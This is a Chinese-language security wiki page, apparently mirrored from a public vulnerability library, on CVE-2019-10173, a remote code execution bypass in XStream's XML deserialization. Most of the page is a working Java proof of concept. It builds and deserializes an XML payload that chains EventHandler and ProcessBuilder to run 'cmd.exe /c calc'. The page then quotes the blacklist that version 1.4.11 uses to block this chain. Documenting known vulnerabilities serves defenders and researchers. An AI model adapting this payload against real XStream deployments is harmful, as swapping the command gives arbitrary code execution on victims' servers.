menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right XStream chevron_right (CVE-2019-10173)Xstream 远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-10173)Xstream 远程代码执行漏洞.md
    3.28 KB / 2021-04-21 09:23:46
        (CVE-2019-10173)Xstream 远程代码执行漏洞
    ==========================================
    
    一、漏洞简介
    ------------
    
    Xstream 1.4.10版本存在反序列化漏洞CVE-2013-7285补丁绕过。
    
    二、漏洞影响
    ------------
    
    XStream \<= 1.4.6
    
    XStream = 1.4.10
    
    三、复现过程
    ------------
    
    ### poc
    
        package com.bigo;
    
        import com.thoughtworks.xstream.XStream;
    
        import java.beans.EventHandler;
        import java.io.IOException;
        import java.util.Set;
        import java.util.TreeSet;
    
        /**
         * Created by cfchi on 2019/7/26.
         */
        public class Main {
            public static String expGen(){
                XStream xstream = new XStream();
                Set<Comparable> set = new TreeSet<Comparable>();
                set.add("foo");
                set.add(EventHandler.create(Comparable.class, new ProcessBuilder("calc"), "start"));
                String payload = xstream.toXML(set);
                System.out.println(payload);
                return payload;
            }
            public static void main(String[] args) throws IOException {
                expGen();
                XStream xStream = new XStream();
                String payload = "<sorted-set>\n" +
                        "    <string>foo</string>\n" +
                        "    <dynamic-proxy>\n" +
                        "    <interface>java.lang.Comparable</interface>\n" +
                        "        <handler class=\"java.beans.EventHandler\">\n" +
                        "            <target class=\"java.lang.ProcessBuilder\">\n" +
                        "                <command>\n" +
                        "                    <string>cmd.exe</string>\n" +
                        "                    <string>/c</string>\n" +
                        "                    <string>calc</string>\n" +
                        "                </command>\n" +
                        "            </target>\n" +
                        "     <action>start</action>"+
                        "        </handler>\n" +
                        "    </dynamic-proxy>\n" +
                        "</sorted-set>\n";
               xStream.fromXML(payload);
            }
        }
    
    ### 1.4.7版本白名单
    
    ![](./resource/(CVE-2019-10173)Xstream远程代码执行漏洞/media/rId26.png)
    
    ### 1.4.10版本,黑名单未开启
    
    ![](./resource/(CVE-2019-10173)Xstream远程代码执行漏洞/media/rId28.png)
    
    ### 1.4.11版本,黑名单开启
    
    #### 黑名单
    
        private class InternalBlackList implements Converter {
            private InternalBlackList() {
            }
    
            public boolean canConvert(Class type) {
                return type == Void.TYPE || type == Void.class || !XStream.this.securityInitialized && type != null && (type.getName().equals("java.beans.EventHandler") || type.getName().endsWith("$LazyIterator") || type.getName().startsWith("javax.crypto."));
            }
    
            public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
                throw new ConversionException("Security alert. Marshalling rejected.");
            }
    
            public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
                throw new ConversionException("Security alert. Unmarshalling rejected.");
            }
        }
    
    ![](./resource/(CVE-2019-10173)Xstream远程代码执行漏洞/media/rId31.png)
    
    参考链接
    --------
    
    > http://www.polaris-lab.com/index.php/archives/658/
    
    
    links
    file_download